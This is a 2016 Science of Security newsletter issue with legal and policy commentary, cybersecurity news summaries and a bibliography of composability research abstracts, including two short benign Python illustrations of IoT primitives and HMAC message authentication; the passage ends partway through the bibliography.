Science of Security (SoS) Newsletter (2016 - Issue 5)



Each issue of the SoS Newsletter highlights achievements in current research conducted by members of the global Science of Security (SoS) community. All presented materials are open source and may link to the original work or web page for the respective program. The SoS Newsletter aims to showcase the exciting work going on in the security community and to serve as a portal connecting colleagues, research projects, and opportunities.

Please feel free to click on any section of the Newsletter listed below to go to its corresponding subsection:

Publications of Interest

The Publications of Interest section provides available abstracts and links for suggested academic and industry literature discussing specific topics and research problems in the field of SoS. Please check back regularly for new information, or sign up for the CPSVO-SoS Mailing List.

(ID#: 16-8944)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber Scene #2

This section of the Newsletter is intended to provide an informative, timely backdrop of the events, thinking, and developments that feed into the technological advancement of SoS cybersecurity collaboration and extend its outreach.

Cybersecurity: Raising the Bar

Legal perspectives on overarching academic, Intelligence Community, private-sector, and Congressional concerns

  

(1) The American Bar Association Standing Committee on Law and National Security continues its work, begun in 1962, of educating the Bar and the public on rule-of-law issues to preserve the freedoms of democracy and national security. To that effect, the Cybersecurity Working Group was founded in 2012 and, by the end of 2013, had compiled, for “educational and informational purposes” (many legal disclaimers here!), “The Playbook for Cyber Events” and “The ABA Cybersecurity Handbook.” The working group continues, with support from its Cybersecurity Legal Task Force, to convene and explore contemporary as well as future legal aspects of cybersecurity concerns and to be poised, a priori, for action. Read more at: http://www.americanbar.org/groups/public_services/law_national_security.html and http://www.americanbar.org/groups/leadership/office_of_the_president/cybersecurity.html

Three events in Washington D.C. are slated for June–November 2016 to advance this forum’s discussion and understanding. They are:

  1. 8 June 2016, NYU in Washington, D.C. The Honorable James E. Baker, Chief Judge (ret.), U.S. Court of Appeals for the Armed Forces, and Chair, ABA Standing Committee on Law and National Security, will introduce a forum with authors Zachary Goldman and Samuel Rascoff, who will discuss their book Global Intelligence Oversight, which addresses cybersecurity among related topics. ABA National Security Chair Harvey Rishikof will moderate.
    See: http://www.americanbar.org/content/dam/aba/images/law_national_security/book-talk-june-8-flyer.pdf
     
  2. 24-25 August 2016, 11th Annual Homeland Security Law Institute, Washington Convention Center, Washington D.C.
    See: http://shop.americanbar.org/ebus/ABAEventsCalendar/EventDetails.aspx?productId=240666089
     
  3. 14-15 November 2016, The 26th Annual Review of the Field of National Security Law, Washington D.C.
    See: http://www.americanbar.org/groups/public_services/law_national_security.html
     

(2) Relatedly, both formal publications (e.g., law reviews) and informal blogs are addressing the legal cybersecurity issues on today’s table. The Harvard National Security Journal (http://harvardnsj.org/2016/02/volume-7-1/) is a law-student/think-tank joint venture affiliated with the Harvard Law School - Brookings Project on Law and Security, capturing both broad governmental perspectives (e.g., the Assistant Attorney General for National Security’s address to Harvard Law on future options) and animated blog-based exchanges. One such exchange centers on “Don’t Panic,” the Harvard Berkman Center report co-authored by Susan Landau, which posited that the growth of strong encryption would not significantly hinder intelligence or law enforcement collection. This has launched a spirited response from academic, legal, Intelligence Community, and Congressional quarters over the last two weeks (through 21 May to date), including from the Director of National Intelligence, Jim Clapper, who countered in a letter to Senator Wyden that the Berkman Center report was wrong, and that “the impediments to our efforts to protect the nation...cannot be fully mitigated by alternative means.” The debate continues to spawn a host of thoughtful legal opinions from law professors and students, the Journal of National Security Law and Policy, the Heritage Foundation, the Brookings Institution and Stanford’s Hoover Institution, as well as homeland security consultants and present and former senior DHS and IC officials. See https://www.lawfareblog.com/ic-thinks-harvard-wrong-about-encryption for a sampling and useful links.


(ID#: 16-11359)

In the News

This section features topical, current news items of interest to the international security community. These articles and highlights are selected from various popular science and security magazines, newspapers, and online sources.


US News     

 

“FDIC Reports Five ‘Major Incidents’ of Cybersecurity Breaches Since Fall,” The Washington Post, 9 May 2016. [Online].
The FDIC reported five major breaches of taxpayers’ personal information since 30 October 2015. The agency defines a major incident as a breach of at least 10,000 records. All five incidents were similar in nature: employees accidentally transferred the files to USB devices. As a precaution, the use of removable media has since been blocked.
See: https://www.washingtonpost.com/news/powerpost/wp/2016/05/09/fdic-reports-five-major-incidents-of-cybersecurity-breaches-since-fall/

 

“McAfee Confirms He'll Head Cybersecurity Company,” USA Today, 10 May 2016. [Online].
John McAfee confirmed that he would be taking over as CEO of tech company MGT Capital Investments, previously known mostly for its development of mobile games. The company will be rebranding itself to focus on cybersecurity and privacy. McAfee says that the company's first product will be “D-Vasive,” anti-spyware for smartphones that secures the device's camera, microphone, and Bluetooth.
See: http://www.usatoday.com/story/tech/2016/05/09/john-mcafee-head-tech-company/84136762/

 

“Congress Warned About Cybersecurity After Attempted Ransomware Attack on House,” Tech Crunch, 10 May 2016. [Online].
A new wave of ransomware attacks was recently launched at the U.S. House of Representatives. The attacks targeted House members mainly through third-party email apps like Yahoo Mail and Gmail, prompting officials to block access to Yahoo Mail on their network altogether. It is unknown whether any of the ransomware attacks were successful.
See: http://techcrunch.com/2016/05/10/congress-warned-about-cybersecurity-after-attempted-ransomware-attack-on-house/

 

“Computer Science Teachers Need Cybersecurity Education Says CSTA Industry Group,” Tech Republic, 10 May 2016. [Online].
The Computer Science Teachers Association is creating a new 8-hour program to help educate middle school and high school teachers on cybersecurity. Shockingly, only ten percent of those teachers have degrees in computer science, with most coming from related fields like math. The program aims to bring these teachers up to speed on topics such as compliance and authentication.
See: http://www.techrepublic.com/article/cs-teachers-ramping-up-cybersecurity-education/
 

 

International News 

 

“Why Automation is the Key to the Future of Cyber Security,” Network World, 3 May 2016. [Online].
The complexity and volume of cyber attacks have been growing rapidly for quite some time, and the ugly truth is that it is nearly impossible to keep up with all of them. It would make perfect sense to automate some of the tasks associated with security; however, it is not that simple. This article explores some of the challenges companies face in automating cyber security.
See: http://www.networkworld.com/article/3065296/security/why-automation-is-the-key-to-the-future-of-cyber-security.html

 

“Will Artificial Intelligence Revolutionize Cybersecurity?,” The Christian Science Monitor, 4 May 2016. [Online].
Artificial intelligence (AI) is being examined as a possible means for improving cybersecurity. AI is more popular than ever, and some researchers believe that it can be used to monitor attacks or even attempt to break systems. Additionally, the White House is hosting a series of workshops to explore the potential benefits of incorporating artificial intelligence into cybersecurity.
See: http://www.csmonitor.com/World/Passcode/2016/0504/Will-artificial-intelligence-revolutionize-cybersecurity

 

“Cyberattacks: Two-Thirds of All Big Businesses in UK Breached in the Past Year,” International Business Times, 8 May 2016. [Online].
A new survey shows that nearly two-thirds of big businesses in the UK suffered a data breach in 2015. Additionally, roughly a quarter of all businesses in the UK were hacked in some way, with the most common attacks involving malware, spyware, or other viruses, and impersonation of the organisation. Perhaps even more surprising is the fact that 70% of the attacks were preventable.
See: http://www.ibtimes.co.uk/cyber-attacks-two-thirds-all-big-businesses-uk-breached-past-year-1558852

 

“Top 2016 Cybersecurity Reports Out from AT&T, Cisco, Dell, Google, IBM, McAfee, Symantec and Verizon,” Forbes, 9 May 2016. [Online].
Several major companies have published their reports on cybersecurity for 2016. The companies include AT&T, Cisco, Dell, Google, IBM, McAfee, Symantec, and Verizon. The reports include each company's take on topics such as data breaches, defense strategies, and cybercrime.
See: http://www.forbes.com/sites/stevemorgan/2016/05/09/top-2016-cybersecurity-reports-out-from-att-cisco-dell-google-ibm-mcafee-symantec-and-verizon/#19d7bf483edb

 

“$81 Million Bangladesh Bank Heist Sparks Push for Stepped-Up Cybersecurity,” NPR, 24 May 2016. [Online].
Following a shocking $81 million heist from the central bank of Bangladesh, SWIFT CEO Gottfried Leibbrandt says they are going after the cyber criminals. The Society for Worldwide Interbank Financial Telecommunication (SWIFT) is the messaging system responsible for transferring billions of dollars each day. SWIFT was long believed to be highly secure; however, Leibbrandt revealed that they are aware of at least two other breaches.
See: http://www.npr.org/sections/thetwo-way/2016/05/24/479311978/-81-million-bangladesh-bank-heist-sparks-push-for-stepped-up-cybersecurity

 

“UK Government Details Plans for National Cyber Security Centre,” Computer Weekly, 26 May 2016. [Online].
The U.K. has released a plan for its recently revealed National Cyber Security Centre. The plan includes four main objectives for the centre:

  • To understand the cyber security environment, share knowledge, and use that expertise to identify and address systemic vulnerabilities; 
  • To reduce risks to the UK by working with public and private sector organisations to improve their cyber security; 
  • To respond to cyber security incidents to reduce the harm they cause to the UK; and
  • To nurture and grow our national cyber security capability, and provide leadership on critical national cyber security issues.

See: http://www.computerweekly.com/news/450297182/UK-Government-details-plans-for-National-Cyber-Security-Centre

 

“Brazilian Companies Rank Worst Among Major Economies on Cyber Security: Report,” Yahoo, 26 May 2016. [Online].
A recent report from security ratings company BitSight showed that the cybersecurity metrics of companies based in Brazil were significantly poorer than those of most other major economies included in the study. Some of Brazil’s weakest points included compromise rates, email security, and file sharing practices. Additionally, nearly half of all Brazilian companies engaged in risky file sharing on a company network, whereas the rate for most other countries was closer to a quarter or a third.
See: https://www.yahoo.com/tech/brazilian-companies-rank-worst-among-major-economies-cyber-090350492.html


(ID#: 16-11358)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Publications of Interest

The Publications of Interest section contains bibliographical citations, abstracts if available, and links on specific topics and research problems of interest to the Science of Security community.

How recent are these publications?

These bibliographies include recent scholarly research, presented or published within the past year, on topics of interest to the community. Some entries represent updates of work presented in previous years; others cover new topics.

How are topics selected?

The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness for current researchers.

How can I submit or suggest a publication?

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Submissions and suggestions may be sent to: news@scienceofsecurity.net

(ID#: 16-11188)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Composability 2015

Composability is one of the five hard problems for the Science of Security. The work cited here was presented in 2015.



Gabriel Fernandez et al., “Seeking Time-Composable Partitions of Tasks for COTS Multicore Processors,” Real-Time Distributed Computing (ISORC), 2015 IEEE 18th International Symposium on, Auckland, 2015, vol., no., pp. 208–217. doi:10.1109/ISORC.2015.43
Abstract: The timing verification of real-time single core systems involves a timing analysis step that yields an Execution Time Bound (ETB) for each task, followed by a schedulability analysis step, where the scheduling attributes of the individual tasks, including the ETB, are studied from the system level perspective. The transition between those two steps involves accounting for the interference effects that arise when tasks contend for access to shared resource. The advent of multicore processors challenges the viability of this two-step approach because several complex contention effects at the processor level arise that cause tasks to be unable to make progress while actually holding the CPU, which are very difficult to tightly capture by simply inflating the tasks’ ETB. In this paper we show how contention on access to hardware shared resources creates a circular dependence between the determination of tasks’ ETB and their scheduling at runtime. To help loosen this knot we present an approach that acknowledges different flavors of time composability, examining in detail the variant intended for partitioned scheduling, which we evaluate on two real processor boards used in the space domain.
Keywords: formal verification; multiprocessing systems; COTS multicore processors; ETB; circular dependence; execution time bound; hardware shared resources; interference effects; real processor boards; real-time single core systems; schedulability analysis step; seeking time composable partitions; space domain; timing analysis; timing verification; Hardware; Multicore processing; Processor scheduling; Program processors; Resource management; Scheduling; Timing; COTS Multicores; Task Allocation in Multicores; Time Composability (ID#: 16-9527)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7153808&isnumber=7153773

 

J. Waters; J. Pilcher; B. Plutchak; E. Voncolln; D. Grady; R. Patel, “Describing and Reusing Warfighter Processes and Products: An Agile Training Framework,” Cognitive Methods in Situation Awareness and Decision Support (CogSIMA), 2015 IEEE International Multi-Disciplinary Conference on, Orlando, FL, 2015, vol., no., pp. 140–144. doi:10.1109/COGSIMA.2015.7108189
Abstract: This position paper describes a framework, i.e. a set of design and architecture recommendations, for achieving agile training. The approach for the design is to be process and data driven, focused on reusability, and borrowing basic principles derived from web-based architectures, semantic processing, user-centered design, composability, complexity management, machine-understandability, scalability, gaming and open linked data. The fundamental features of the framework are open, easily understood, easily implemented, and tool-agnostic. With such a framework defined, the training community could collaborate to build out the more extensive cloud content, extend the capability and ensure that the benefits of agile training are achieved, namely more focused and faster training on shared processes anytime, anywhere at reduced cost and without a large support staff.
Keywords: computer based training; military computing; Web-based architectures; agile training framework; cloud content; complexity management; composability; gaming; machine-understandability; open linked data; scalability; semantic processing; user-centered design; warfighter process; warfighter products; Communities; Conferences; Process control; Scalability; Standards; Training; Uniform resource locators; Agile; Decision making; Training; applications; command and control; resource allocation and management; standards; web services (ID#: 16-9528)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7108189&isnumber=7107964

 

Yonglin Lei; Ning Zhu; Jian Yao; Zhi Zhu; H.S. Sarjoughian, “Model-Architecture Oriented Combat System Effectiveness Simulation,” Winter Simulation Conference (WSC), 2015, Huntington Beach, CA, USA, 2015, vol., no., pp. 3190–3191. doi:10.1109/WSC.2015.7408464
Abstract: Combat system effectiveness simulation (CESS) is a special type of complex system simulation. Three non-functional requirements (NFRs), i.e. model composability, domain-specific modeling, and model evolvability are gaining higher priority from CESS users when evaluating different modeling methodologies for CESS. Traditional CESS modeling methodologies are either domain-neutral (lack of domain characteristics consideration and limited support for model composability) or domain-oriented (lack of openness and evolvability) and fall short of the three NFRs. Inspired by the concept of architecture in systems engineering and software engineering fields, we extend it into a concept of model architecture for complex simulation systems, and propose a model-architecture oriented modeling methodology in which model architecture plays a central role in achieving the three NFRs. Various model-driven engineering (MDE) approaches and technologies, including SMP, UML, DSM, and so forth, are applied where possible in representing the CESS model architecture and its components’ behaviors from physical and cognitive domain aspects.
Keywords: Architecture; Complex systems; Computer architecture; Modeling; Software engineering; Standards; Unified modeling language (ID#: 16-9529)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7408464&isnumber=7408148

 

J. Voas, “Keynote Speech: Foundations of the Internet of Things, by Jeffrey Voas,” Trustworthy Systems and Their Applications (TSA), 2015 Second International Conference on, Hualien, 2015, vol., no., pp. xiii–xiii. doi:10.1109/TSA.2015.11
Abstract: Eight core primitives belonging to most distributed computing systems, and in particular systems with large amounts of data, scalability concerns, heterogeneity concerns, temporal concerns, and actors of unknown pedigree and possible nefarious intent, are presented. Primitives allow formalisms, reasoning, simulations, and reliability and security risk-tradeoffs to be formulated and argued. These eight primitives are basic building blocks for a Network of ‘Things’ (NoT), including the Internet of Things (IoT), an emerging ‘new’ distributed computing paradigm. They are: sensor, snapshot (time), cluster, aggregator, weight, communication channel, eUtility, and decision. A composability model and vocabulary that defines principles common to most, if not all, NoTs is needed. For example, “what is the science, if any, underlying the IoT?” Primitives offer answers by allowing comparisons between one NoT architecture and another. They offer a unifying vocabulary that allows for composition and information exchange among differently purposed networks. And they prove useful towards more subtle concerns, including interoperability, composability, and late-binding of assets that come and go on-the-fly, all of which are large concerns for IoT.
Keywords: Internet of Things; inference mechanisms; security of data; Network of Things; communication channel; distributed computing paradigm; distributed computing systems; eUtility; eight core primitives; information exchange; reasoning; security risk-tradeoffs; simulations (ID#: 16-9530)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335937&isnumber=7335925
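
Voas’s eight primitives invite a compact illustration. The following Python sketch is ours, not a formalism from the keynote; names such as Reading, aggregator, and decision are hypothetical. It encodes a sensor reading stamped with a snapshot, a weight function, an aggregator over a cluster, and a decision:

    from dataclasses import dataclass, field
    import time

    @dataclass
    class Reading:
        """One 'sensor' output stamped with a 'snapshot' (time)."""
        sensor_id: str
        value: float
        snapshot: float = field(default_factory=time.time)

    def aggregator(cluster, weight=lambda r: 1.0):
        """Collapse a 'cluster' of readings into one value, honoring each 'weight'."""
        total = sum(weight(r) for r in cluster)
        return sum(weight(r) * r.value for r in cluster) / total

    def decision(aggregate, threshold):
        """The 'decision' primitive: act on the aggregated evidence."""
        return "alert" if aggregate > threshold else "ok"

    cluster = [Reading("t1", 21.0), Reading("t2", 29.5), Reading("t3", 35.0)]
    print(decision(aggregator(cluster), threshold=30.0))  # mean 28.5 -> "ok"

Even at this toy scale, the vocabulary supports the comparisons the abstract describes: two differently purposed networks built from the same primitives can exchange Reading values without sharing an architecture.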

 

J.C.S. dos Anjos et al., “SMART: An Application Framework for Real Time Big Data Analysis on Heterogeneous Cloud Environments,” Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, vol., no., pp. 199–206. doi:10.1109/CIT/IUCC/DASC/PICOM.2015.29
Abstract: The amount of data that human activities generate poses a challenge to current computer systems. Big data processing techniques are evolving to address this challenge, with analysis increasingly being performed using cloud-based systems. Emerging services, however, require additional enhancements in order to ensure their applicability to highly dynamic and heterogeneous environments and facilitate their use by Small & Medium-sized Enterprises (SMEs). Observing this landscape in emerging computing system development, this work presents Small & Medium-sized Enterprise Data Analytic in Real Time (SMART) for addressing some of the issues in providing compute service solutions for SMEs. SMART offers a framework for efficient development of Big Data analysis services suitable to small and medium-sized organizations, considering very heterogeneous data sources, from wireless sensor networks to data warehouses, focusing on service composability for a number of domains. This paper presents the basis of this proposal and preliminary results on exploring application deployment on hybrid infrastructure.
Keywords: Big Data; cloud computing; data analysis; data warehouses; small-to-medium enterprises; wireless sensor networks; SMART; SME; cloud-based system; computing system development; data warehouse; heterogeneous cloud environment; real time Big data analysis; small-and-medium-sized enterprise data analytic-in-real time; small-and-medium-sized organization; wireless sensor network; Big data; Cloud computing; Data models; Monitoring; Performance evaluation; Quality of service; Real-time systems; Cloud Computing; Data Analytics; Hybrid Clouds; SMEs (ID#: 16-9531)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363071&isnumber=7362962

 

R. Udechukwu; R. Duttay, “Service Definition Semantics for Optical Services on a Choice-Based Network,” Optical Network Design and Modeling (ONDM), 2015 International Conference on, Pisa, 2015, vol., no., pp. 98–103. doi:10.1109/ONDM.2015.7127281
Abstract: Optical networks continue to provide the high-performance, high-bandwidth substrate of the planetary communication networks. The rapidly increasing and changing variety of demands placed on such networks requires that optical networks be increasingly agile and responsive to end-consumer traffic needs. Because of multiple levels of aggregation, the optical core is generally less responsive to changing needs at access levels. We have previously proposed that providing architectural mechanisms that allow the provider to inform the customer of available alternatives enables a co-optimization of network resources jointly by customers and providers, leading to better performance for the customer while utilizing resources more efficiently for the provider. In this paper, we show how optical switching capabilities may be abstracted as services to enable the automatic composability that is required for such a system. We have successfully demonstrated a proof-of-concept prototype of this architecture in the GENI environment, which we briefly describe.
Keywords: optical fibre networks; optical switches; telecommunication traffic; GENI environment; architectural mechanisms; choice-based network; end-consumer traffic; network resources cooptimization; optical networks; optical services; optical switching capabilities; planetary communication networks; service definition semantics; Adaptive optics; Optical buffering; Optical design; Optical network units; Optical packet switching; Optical switches (ID#: 16-9532)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7127281&isnumber=7127253

 

A. Benin; S. Toledo; E. Tromer, “Secure Association for the Internet of Things,” Secure Internet of Things (SIoT), 2015 International Workshop on, Vienna, Austria, 2015, vol., no., pp. 25–34. doi:10.1109/SIOT.2015.14
Abstract: Existing standards (ZigBee and Bluetooth Low Energy) for networked low-power wireless devices do not support secure association (or pairing) of new devices into a network: their association process is vulnerable to man-in-the-middle attacks. This paper addresses three essential aspects in attaining secure association for such devices. First, we define a user-interface primitive, oblivious comparison, that allows users to approve authentic associations and abort compromised ones. This distills and generalizes several existing approve/abort mechanisms, and moreover we experimentally show that OC can be implemented using very little hardware: one LED and one switch. Second, we provide a new Message Recognition Protocol (MRP) that allows devices associated using oblivious comparison to exchange authenticated messages without the use of public key cryptography (which exceeds the capabilities of many IoT devices). This protocol improves upon previously proposed MRPs in several respects. Third, we propose a robust definition of security for MRPs that is based on universal composability, and show that our MRP protocol satisfies this definition.
Keywords: Bluetooth; Cameras; Light emitting diodes; Materials requirements planning; Protocols; Standards; Zigbee
(ID#: 16-9533)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7411835&isnumber=7411823
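
The paper’s Message Recognition Protocol is not reproduced in the abstract, but the constraint it works under, authenticating messages without public-key cryptography, can be suggested with a plain symmetric-MAC sketch. This is a generic illustration, not the authors’ MRP; it assumes a shared_key already established during the oblivious-comparison pairing:

    import hmac, hashlib, os

    # Assume association (oblivious comparison) already yielded a shared key.
    shared_key = os.urandom(16)

    def tag(message: bytes) -> bytes:
        # Symmetric MAC: cheap enough for constrained IoT devices.
        return hmac.new(shared_key, message, hashlib.sha256).digest()

    def recognize(message: bytes, mac: bytes) -> bool:
        # Constant-time comparison guards against timing side channels.
        return hmac.compare_digest(tag(message), mac)

    msg = b"unlock"
    assert recognize(msg, tag(msg))              # authentic message accepted
    assert not recognize(b"tampered", tag(msg))  # forgery rejected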

 

Gabriel Fernandez et al., “Resource Usage Templates and Signatures for COTS Multicore Processors,” Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, San Francisco, CA, 2015, vol., no., pp. 1-6. doi:10.1145/2744769.2744858
Abstract: Upper bounding the execution time of tasks running on multi-core processors is a hard challenge. This is especially so with commercial-off-the-shelf (COTS) hardware that conceals its internal operation. The main difficulty stems from the contention effects on access to hardware shared resources (e.g, buses) which cause task’s timing behavior to depend on the load that co-runner tasks place on them. This dependence reduces time composability and constrains incremental verification. In this paper we introduce the concepts of resource-usage signatures and templates, to abstract the potential contention caused and incurred by tasks running on a multicore. We propose an approach that employs resource-usage signatures and templates to enable the analysis of individual tasks largely in isolation, with low integration costs, producing execution time estimates per task that are easily composable throughout the whole system integration process. We evaluate the proposal on a 4-core NGMP-like multicore architecture.
Keywords: multiprocessing systems; 4-core NGMP-like multicore architecture; COTS multicore processors; commercial-off-the-shelf hardware; hardware shared resources; low integration cost; resource usage templates; resource-usage signatures; task timing behavior; upper bounding; Delays; Industries; Kernel; Multicore processing; Real-time systems; System-on-chip (ID#: 16-9534)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167309&isnumber=7167177

 

C. Huebner; A. Fedorov; C. Huth; C. Diedrich, “Extensible Distribution Grid Automation Using IEC 61131 in Simulation and Operation,” International ETG Congress 2015; Die Energiewende - Blueprints for the new energy age; Proceedings of, Bonn, Germany, 2015, vol., no., pp. 1–7. doi: not provided
Abstract: The implementation of active distribution grids as a precondition for the smart energy system requires a decentralized automation approach that is based on proven technologies and standards allowing for flexible extensibility of power grid automation functions. In a decentralized automation approach the secondary substations play a major role and need to be equipped with reliable measurement and control technology. This suggests the use of programmable logic controller (PLC) technology as described by the IEC 61131 standard. Existing secondary substations can be upgraded by such PLC-based systems to provide not just monitoring and remote control but also advanced smart grid functions. The key challenge of future-proof distribution grid automation is the extensibility of these functions in order to satisfy new requirements. Functional extensibility demands modularization and composability, which is provided by the IEC 61131-3 standard in the form of function blocks. The development, evaluation and application of advanced power grid monitoring and control functions require tools for integrated simulation of function blocks and the power grid model. Such a tool is developed in the research project MD-E4 based on the SIMBA# simulation platform. It is applied for design and evaluation of IEC 61131 based power flow, state estimation and control functions, which are also evaluated in practice by running on physical PLCs that are installed in secondary substations in the distribution grid of Magdeburg.
Keywords: not provided (ID#: 16-9535)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7388518&isnumber=7388454

 

T. Hatanaka; N. Chopra; M.W. Spong, “Passivity-Based Control of Robots: Historical Perspective and Contemporary Issues,” Decision and Control (CDC), 2015 54th IEEE Conference on, Osaka, Japan, 2015, vol., no., pp. 2450–2452. doi:10.1109/CDC.2015.7402575
Abstract: Passivity is one of the most physically appealing concepts in systems and control theory. The stored internal energy in a passive system is bounded from above by the externally supplied energy. It is well known that this energy dissipation property has important implications for closed-loop stability. Additionally, the passivity property is preserved with respect to feedback and parallel interconnections of passive systems. This composability property of passive systems is crucial in designing and analyzing highly networked systems. Due to these desirable features, the passivity paradigm has been widely utilized to achieve outstanding success in robot control, which is the main focus of the session. The tutorial session starts with a historical perspective on passivity-based robot control and its broad applicability to several important problems in robotics. Despite the long history, passivity-based robot control is being actively utilized in addressing emerging problems in robot control. Hence, the remainder of the session presents application of passivity-based robot control to address important research issues in bilateral teleoperation, visual feedback estimation and robot control, cooperative robot control, and mixed human-robot teams.
Keywords: Manipulators; Robot control; Robot kinematics; Synchronization; Tutorials; Visualization (ID#: 16-9536)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7402575&isnumber=7402066

 

J. Valencia; D. Goswami; K. Goossens, “Composable Platform-Aware Embedded Control Systems on a Multi-Core Architecture,” Digital System Design (DSD), 2015 Euromicro Conference on, Funchal, Madeira, Portugal, 2015, vol., no., pp. 502–509. doi:10.1109/DSD.2015.74
Abstract: In this work, we propose a design flow for efficient implementation of embedded feedback control systems targeted for multi-core platforms. We consider a composable tile-based architecture as an implementation platform and realise the proposed design flow onto one instance of this architecture. The proposed design flow implements the feedback loops in a data-driven fashion leading to time-varying sampling periods with short average sampling period. Our design flow is composed of two phases: (i) representing the timing behaviour imposed by the platform by a finite and known set of sampling periods, which is achieved exploiting the composability of the platform, and (ii) a linear matrix inequality (LMI) based platform-aware control algorithm that explicitly takes the derived platform timing characteristics and the shorter average sampling period into account. Our results show that the platform-aware implementation outperforms traditional control design flows (i.e., almost 2 times) in terms of quality of control (QoC).
Keywords: control engineering computing; control system synthesis; embedded systems; feedback; linear matrix inequalities; multiprocessing systems; time-varying systems; LMI based platform-aware control algorithm; composable platform-aware embedded control systems; composable tile-based architecture; control design flows; embedded feedback control systems; linear matrix inequality; multicore architecture; quality of control; short average sampling period; time-varying sampling periods; Clocks; Context; Control systems; Feedback control; Resource management; Time division multiplexing; Timing; composable; embedded control systems; lmi-based control; multi-core architecture; predictable; quality of control (ID#: 16-9537)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7302315&isnumber=7302233

 

M. Nikitchenko, “Intensionality, Compositionality, and Nominativity in Information System Development,” Intelligent Computing and Information Systems (ICICIS), 2015 IEEE Seventh International Conference on, Cairo, 2015, vol., no., pp. 1–2. doi:10.1109/IntelCIS.2015.7397186
Abstract: Summary form only given. The process of information system development consists of several phases including, in particular, system analysis, specification, design, and implementation. Each of these phases is based on some abstractions that can be roughly divided into two groups of general and specific abstractions respectively. In this talk we address such general abstractions as intensionality, compositionality, and nominativity. Intensionality is understood in the traditional sense as a counterpart to extensionality; together they complete each other and define the main aspects of notions in their integrity. Compositionality means that a system is constructed of smaller subsystems with the help of special construction operations called compositions. Nominativity emphasizes the importance of naming relations for describing system aspects. We analyze and illustrate the use of the above-mentioned abstractions in different phases of system development. Considering conventional mathematical formalisms, we admit that they are based on the extensionality principle, which restricts and complicates usage of such formalisms in system development. Therefore we construct formal mathematical structures based on the principles of intensionality, compositionality, and nominativity. These structures can be considered generalizations of traditional notions of algebras and logics for classes of “dynamic” data and functions. Introduction of such formalisms also permits us to define a special kind of intensionalized computability that better reflects the specifics of executable components of information systems. We compare the constructed formalisms with existing ones and demonstrate that they are rather expressive and more adequate for information system development.
Keywords: abstracting; information systems; abstractions; compositionality; compositions; construction operations; design phase; dynamic data; dynamic functions; formal mathematical structures; implementation phase; information system development process; intensionality; intensionalized computability; nominativity; specification phase; system analysis phase; system aspect description; Biographies (ID#: 16-9538)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7397186&isnumber=7397173

 

J.D. Haynes; D. Wisniewski; K. Görgen; I. Momennejad; C. Reverberi, “FMRI Decoding of Intentions: Compositionality, Hierarchy and Prospective Memory,” Brain-Computer Interface (BCI), 2015 3rd International Winter Conference on, Sabuk, South Korea, 2015, vol., no., pp. 1–3. doi:10.1109/IWW-BCI.2015.7073031
Abstract: In recent years, multivariate decoding has made it possible to test where and how mental representations can be decoded from neuroimaging signals, which sheds light on how these representations are encoded in the brain. In one line of experiments, we investigated how intentions are encoded in fMRI signals, revealing information in medial and lateral prefrontal regions. These informative neural representations were even present prior to the person’s awareness of their chosen intention. In comparison, for cued intentions we found information predominantly in lateral, but not medial, prefrontal cortex. Intention coding in prefrontal cortex followed a compositional code and could also be observed across extended delays during which participants were busy performing other tasks. Taken together, our results suggest a systematic, compositional, and hierarchical code in prefrontal cortex in which intentions are encoded across delays while the mind is busy working on other tasks.
Keywords: biomedical MRI; brain; image coding; medical image processing; neurophysiology; FMRI decoding-of-intentions; brain encoding; compositional code; compositionality memory; extended delays; fMRI signal encoding; hierarchy memory; informative neural representations; intention coding; lateral prefrontal regions; medial prefrontal regions; multivariate decoding; neuroimaging signals; person awareness; prefrontal cortex; prospective memory; Decision support systems; Decoding; Libet-experiment; fMRI; intention; task set (ID#: 16-9539)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073031&isnumber=7073013

 

N. Mavridis; S.B. Kundig; N. Kapellas, “Acquisition of Grounded Models of Adjectival Modifiers Supporting Semantic Composition and Transfer to a Physical Interactive Robot,” Advanced Robotics (ICAR), 2015 International Conference on, Istanbul, 2015, vol., no., pp. 244–251. doi:10.1109/ICAR.2015.7251463
